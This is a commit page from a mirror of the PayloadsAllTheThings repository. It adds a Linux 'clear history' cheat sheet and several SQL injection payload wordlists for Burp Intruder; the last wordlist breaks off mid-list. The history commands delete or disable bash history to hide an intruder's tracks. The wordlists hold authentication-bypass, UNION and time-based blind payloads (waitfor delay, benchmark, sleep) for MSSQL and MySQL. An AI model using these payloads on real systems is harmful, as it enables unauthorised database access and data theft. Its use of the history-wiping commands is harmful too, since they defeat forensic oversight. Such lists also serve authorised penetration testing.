mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 03:16:10 +00:00
SQL injection - Intruders payloads
This commit is contained in:
parent
699d66d701
commit
cce0444245
@ -78,6 +78,26 @@ Clear the last line of the history.
|
|||||||
history -d $(history | tail -2 | awk '{print $1}') 2> /dev/null
|
history -d $(history | tail -2 | awk '{print $1}') 2> /dev/null
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Clear history
|
||||||
|
|
||||||
|
```bash
|
||||||
|
[SPACE] ANY COMMAND
|
||||||
|
or
|
||||||
|
export HISTSIZE=0
|
||||||
|
export HISTFILESIZE=0
|
||||||
|
unset HISTFILE; CTRL-D
|
||||||
|
or
|
||||||
|
kill -9 $$
|
||||||
|
or
|
||||||
|
echo "" > ~/.bash_history
|
||||||
|
or
|
||||||
|
rm ~/.bash_history -rf
|
||||||
|
or
|
||||||
|
history -c
|
||||||
|
or
|
||||||
|
ln /dev/null ~/.bash_history -sf
|
||||||
|
```
|
||||||
|
|
||||||
The following directories are temporary and usually writeable
|
The following directories are temporary and usually writeable
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
@ -86,7 +106,6 @@ The following directories are temporary and usually writeable
|
|||||||
/dev/shm/
|
/dev/shm/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
|
|
||||||
* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
|
* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
|
||||||
|
88
SQL injection/Intruders/SQL-Injection
Normal file
88
SQL injection/Intruders/SQL-Injection
Normal file
@ -0,0 +1,88 @@
|
|||||||
|
'
|
||||||
|
''
|
||||||
|
`
|
||||||
|
``
|
||||||
|
,
|
||||||
|
"
|
||||||
|
""
|
||||||
|
/
|
||||||
|
//
|
||||||
|
\
|
||||||
|
\\
|
||||||
|
;
|
||||||
|
' or "
|
||||||
|
-- or #
|
||||||
|
' OR '1
|
||||||
|
' OR 1 -- -
|
||||||
|
" OR "" = "
|
||||||
|
" OR 1 = 1 -- -
|
||||||
|
' OR '' = '
|
||||||
|
'='
|
||||||
|
'LIKE'
|
||||||
|
'=0--+
|
||||||
|
OR 1=1
|
||||||
|
' OR 'x'='x
|
||||||
|
' AND id IS NULL; --
|
||||||
|
'''''''''''''UNION SELECT '2
|
||||||
|
%00
|
||||||
|
/*…*/
|
||||||
|
+ addition, concatenate (or space in url)
|
||||||
|
|| (double pipe) concatenate
|
||||||
|
% wildcard attribute indicator
|
||||||
|
|
||||||
|
@variable local variable
|
||||||
|
@@variable global variable
|
||||||
|
|
||||||
|
|
||||||
|
# Numeric
|
||||||
|
AND 1
|
||||||
|
AND 0
|
||||||
|
AND true
|
||||||
|
AND false
|
||||||
|
1-false
|
||||||
|
1-true
|
||||||
|
1*56
|
||||||
|
-2
|
||||||
|
|
||||||
|
|
||||||
|
1' ORDER BY 1--+
|
||||||
|
1' ORDER BY 2--+
|
||||||
|
1' ORDER BY 3--+
|
||||||
|
|
||||||
|
1' ORDER BY 1,2--+
|
||||||
|
1' ORDER BY 1,2,3--+
|
||||||
|
|
||||||
|
1' GROUP BY 1,2,--+
|
||||||
|
1' GROUP BY 1,2,3--+
|
||||||
|
' GROUP BY columnnames having 1=1 --
|
||||||
|
|
||||||
|
|
||||||
|
-1' UNION SELECT 1,2,3--+
|
||||||
|
' UNION SELECT sum(columnname ) from tablename --
|
||||||
|
|
||||||
|
|
||||||
|
-1 UNION SELECT 1 INTO @,@
|
||||||
|
-1 UNION SELECT 1 INTO @,@,@
|
||||||
|
|
||||||
|
1 AND (SELECT * FROM Users) = 1
|
||||||
|
|
||||||
|
' AND MID(VERSION(),1,1) = '5';
|
||||||
|
|
||||||
|
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
|
||||||
|
|
||||||
|
|
||||||
|
Finding the table name
|
||||||
|
|
||||||
|
|
||||||
|
Time-Based:
|
||||||
|
,(select * from (select(sleep(10)))a)
|
||||||
|
%2c(select%20*%20from%20(select(sleep(10)))a)
|
||||||
|
';WAITFOR DELAY '0:0:30'--
|
||||||
|
|
||||||
|
Comments:
|
||||||
|
|
||||||
|
# Hash comment
|
||||||
|
/* C-style comment
|
||||||
|
-- - SQL comment
|
||||||
|
;%00 Nullbyte
|
||||||
|
` Backtick
|
107
SQL injection/Intruders/payloads-sql-blind-MSSQL-INSERT
Normal file
107
SQL injection/Intruders/payloads-sql-blind-MSSQL-INSERT
Normal file
@ -0,0 +1,107 @@
|
|||||||
|
)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
')%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
')%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
")%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
")%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
))%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
))%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'))%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'))%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"))%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"))%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL)%20waifor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
40
SQL injection/Intruders/payloads-sql-blind-MSSQL-WHERE
Normal file
40
SQL injection/Intruders/payloads-sql-blind-MSSQL-WHERE
Normal file
@ -0,0 +1,40 @@
|
|||||||
|
waitfor delay '0:0:20' /*
|
||||||
|
waitfor delay '0:0:20' --
|
||||||
|
' waitfor delay '0:0:20' /*
|
||||||
|
' waitfor delay '0:0:20' --
|
||||||
|
" waitfor delay '0:0:20' /*
|
||||||
|
" waitfor delay '0:0:20' --
|
||||||
|
) waitfor delay '0:0:20' /*
|
||||||
|
) waitfor delay '0:0:20' --
|
||||||
|
)) waitfor delay '0:0:20' /*
|
||||||
|
)) waitfor delay '0:0:20' --
|
||||||
|
))) waitfor delay '0:0:20' /*
|
||||||
|
))) waitfor delay '0:0:20' --
|
||||||
|
)))) waitfor delay '0:0:20' /*
|
||||||
|
)))) waitfor delay '0:0:20' --
|
||||||
|
))))) waitfor delay '0:0:20' --
|
||||||
|
)))))) waitfor delay '0:0:20' --
|
||||||
|
') waitfor delay '0:0:20' /*
|
||||||
|
') waitfor delay '0:0:20' --
|
||||||
|
") waitfor delay '0:0:20' /*
|
||||||
|
") waitfor delay '0:0:20' --
|
||||||
|
')) waitfor delay '0:0:20' /*
|
||||||
|
')) waitfor delay '0:0:20' --
|
||||||
|
")) waitfor delay '0:0:20' /*
|
||||||
|
")) waitfor delay '0:0:20' --
|
||||||
|
'))) waitfor delay '0:0:20' /*
|
||||||
|
'))) waitfor delay '0:0:20' --
|
||||||
|
"))) waitfor delay '0:0:20' /*
|
||||||
|
"))) waitfor delay '0:0:20' --
|
||||||
|
')))) waitfor delay '0:0:20' /*
|
||||||
|
')))) waitfor delay '0:0:20' --
|
||||||
|
")))) waitfor delay '0:0:20' /*
|
||||||
|
")))) waitfor delay '0:0:20' --
|
||||||
|
'))))) waitfor delay '0:0:20' /*
|
||||||
|
'))))) waitfor delay '0:0:20' --
|
||||||
|
"))))) waitfor delay '0:0:20' /*
|
||||||
|
"))))) waitfor delay '0:0:20' --
|
||||||
|
')))))) waitfor delay '0:0:20' /*
|
||||||
|
')))))) waitfor delay '0:0:20' --
|
||||||
|
")))))) waitfor delay '0:0:20' /*
|
||||||
|
")))))) waitfor delay '0:0:20' --
|
90
SQL injection/Intruders/payloads-sql-blind-MySQL-INSERT
Normal file
90
SQL injection/Intruders/payloads-sql-blind-MySQL-INSERT
Normal file
@ -0,0 +1,90 @@
|
|||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
18
SQL injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY
Normal file
18
SQL injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY
Normal file
@ -0,0 +1,18 @@
|
|||||||
|
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||||
|
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||||
|
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||||
|
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||||
|
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||||
|
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||||
|
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||||
|
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||||
|
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||||
|
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||||
|
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||||
|
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||||
|
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||||
|
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||||
|
